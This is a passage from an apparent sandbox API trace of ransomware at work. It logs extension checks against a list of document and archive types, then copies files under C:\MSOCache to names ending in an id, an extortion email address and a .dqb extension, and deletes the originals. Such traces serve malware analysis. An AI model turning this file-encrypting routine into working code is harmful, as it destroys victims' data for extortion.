lpString2="xml") returned -1 [0034.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.761] lstrlenW (lpString=".dbf") returned 4 [0034.761] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.761] lstrlenW (lpString=".1cd") returned 4 [0034.761] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.761] lstrlenW (lpString=".jpg") returned 4 [0034.761] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.761] lstrlenW (lpString=".doc") returned 4 [0034.761] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString=".docx") returned 5 [0034.761] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.761] lstrlenW (lpString=".pdf") returned 4 [0034.761] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString=".xls") returned 4 [0034.761] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString=".xlsx") returned 5 [0034.761] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.761] lstrlenW (lpString=".ppt") returned 4 [0034.761] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.761] lstrlenW (lpString=".zip") returned 4 [0034.761] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.761] lstrlenW (lpString=".rar") returned 4 [0034.761] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString=".bz2") returned 4 [0034.761] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.762] lstrlenW (lpString=".7z") returned 3 [0034.762] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.762] lstrlenW (lpString=".dbf") returned 4 [0034.762] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.762] lstrlenW (lpString=".1cd") returned 4 [0034.762] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.762] lstrlenW (lpString=".jpg") returned 4 [0034.762] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.762] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.762] lstrlenW (lpString="Setup.xml") returned 9 [0034.762] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.763] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1988) returned 1 [0034.763] CloseHandle (hObject=0x1a4) returned 1 [0034.764] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.764] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.764] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.764] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.764] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.764] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.764] GetLastError () returned 0x0 [0034.764] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x7c4, lpOverlapped=0x0) returned 1 [0034.766] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0034.767] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.767] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.767] SetEndOfFile (hFile=0x1a0) returned 1 [0034.767] CloseHandle (hObject=0x1a0) returned 1 [0034.767] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.767] SetEndOfFile (hFile=0x1a4) returned 1 [0034.768] CloseHandle (hObject=0x1a4) returned 1 [0034.768] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.768] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.769] lstrlenW (lpString=".doc") returned 4 [0034.769] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.769] lstrlenW (lpString=".docx") returned 5 [0034.769] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.769] lstrlenW (lpString=".pdf") returned 4 [0034.769] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.769] lstrlenW (lpString=".xls") returned 4 [0034.769] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.769] lstrlenW (lpString=".xlsx") returned 5 [0034.769] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.769] lstrlenW (lpString=".ppt") returned 4 [0034.769] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.769] lstrlenW (lpString=".zip") returned 4 [0034.769] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.769] lstrlenW (lpString=".rar") returned 4 [0034.769] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.769] lstrlenW (lpString=".bz2") returned 4 [0034.769] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.769] lstrlenW (lpString=".7z") returned 3 [0034.769] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.769] lstrlenW (lpString=".dbf") returned 4 [0034.769] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.769] lstrlenW (lpString=".1cd") returned 4 [0034.769] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.770] lstrlenW (lpString=".jpg") returned 4 [0034.770] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.770] lstrlenW (lpString=".doc") returned 4 [0034.770] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString=".docx") returned 5 [0034.770] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.770] lstrlenW (lpString=".pdf") returned 4 [0034.770] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString=".xls") returned 4 [0034.770] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString=".xlsx") returned 5 [0034.770] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.770] lstrlenW (lpString=".ppt") returned 4 [0034.770] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.770] lstrlenW (lpString=".zip") returned 4 [0034.770] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.770] lstrlenW (lpString=".rar") returned 4 [0034.770] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString=".bz2") returned 4 [0034.770] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString=".7z") returned 3 [0034.770] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.770] lstrlenW (lpString=".dbf") returned 4 [0034.770] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.770] lstrlenW (lpString=".1cd") returned 4 [0034.770] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.770] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.770] lstrlenW (lpString=".jpg") returned 4 [0034.770] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.771] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.771] lstrlenW (lpString="ProjectMUI.xml") returned 14 [0034.771] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.772] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1452) returned 1 [0034.772] CloseHandle (hObject=0x1a4) returned 1 [0034.772] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 0x2020 [0034.772] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.772] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.772] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.772] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.773] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.773] GetLastError () returned 0x0 [0034.773] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0034.774] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.775] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.775] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.775] SetEndOfFile (hFile=0x1a0) returned 1 [0034.775] CloseHandle (hObject=0x1a0) returned 1 [0034.776] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.776] SetEndOfFile (hFile=0x1a4) returned 1 [0034.777] CloseHandle (hObject=0x1a4) returned 1 [0034.777] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.777] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1 [0034.777] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.777] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.777] lstrlenW (lpString=".doc") returned 4 [0034.777] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.777] lstrlenW (lpString=".docx") returned 5 [0034.777] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.777] lstrlenW (lpString=".pdf") returned 4 [0034.777] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.777] lstrlenW (lpString=".xls") returned 4 [0034.777] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString=".xlsx") returned 5 [0034.778] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.778] lstrlenW (lpString=".ppt") returned 4 [0034.778] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.778] lstrlenW (lpString=".zip") returned 4 [0034.778] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.778] lstrlenW (lpString=".rar") returned 4 [0034.778] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString=".bz2") returned 4 [0034.778] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString=".7z") returned 3 [0034.778] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.778] lstrlenW (lpString=".dbf") returned 4 [0034.778] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.778] lstrlenW (lpString=".1cd") returned 4 [0034.778] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.778] lstrlenW (lpString=".jpg") returned 4 [0034.778] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.778] lstrlenW (lpString=".doc") returned 4 [0034.778] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString=".docx") returned 5 [0034.778] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.778] lstrlenW (lpString=".pdf") returned 4 [0034.778] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString=".xls") returned 4 [0034.778] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString=".xlsx") returned 5 [0034.778] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.778] lstrlenW (lpString=".ppt") returned 4 [0034.778] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.779] lstrlenW (lpString=".zip") returned 4 [0034.779] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.779] lstrlenW (lpString=".rar") returned 4 [0034.779] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.779] lstrlenW (lpString=".bz2") returned 4 [0034.779] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.779] lstrlenW (lpString=".7z") returned 3 [0034.779] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.779] lstrlenW (lpString=".dbf") returned 4 [0034.779] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.779] lstrlenW (lpString=".1cd") returned 4 [0034.779] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.779] lstrlenW (lpString=".jpg") returned 4 [0034.779] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.779] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.779] lstrlenW (lpString="Setup.xml") returned 9 [0034.779] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.779] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1872) returned 1 [0034.779] CloseHandle (hObject=0x1a4) returned 1 [0034.779] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.779] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.780] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.780] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.780] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.981] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.981] GetLastError () returned 0x0 [0034.981] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x750, lpOverlapped=0x0) returned 1 [0035.225] WriteFile (in: hFile=0x170, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x760, lpOverlapped=0x0) returned 1 [0035.226] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.226] WriteFile (in: hFile=0x170, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.226] SetEndOfFile (hFile=0x170) returned 1 [0035.226] CloseHandle (hObject=0x170) returned 1 [0035.227] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.227] SetEndOfFile (hFile=0x1a4) returned 1 [0035.228] CloseHandle (hObject=0x1a4) returned 1 [0035.228] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.228] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.228] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.228] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.228] lstrlenW (lpString=".doc") returned 4 [0035.228] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.228] lstrlenW (lpString=".docx") returned 5 [0035.228] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.228] lstrlenW (lpString=".pdf") returned 4 [0035.228] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.228] lstrlenW (lpString=".xls") returned 4 [0035.228] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.228] lstrlenW (lpString=".xlsx") returned 5 [0035.228] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.228] lstrlenW (lpString=".ppt") returned 4 [0035.229] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString="C:\\MSOCache\\All 